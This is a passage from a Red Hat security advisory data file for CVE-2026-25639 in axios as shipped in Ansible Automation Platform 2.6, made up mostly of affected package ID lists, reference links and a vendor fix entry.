"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
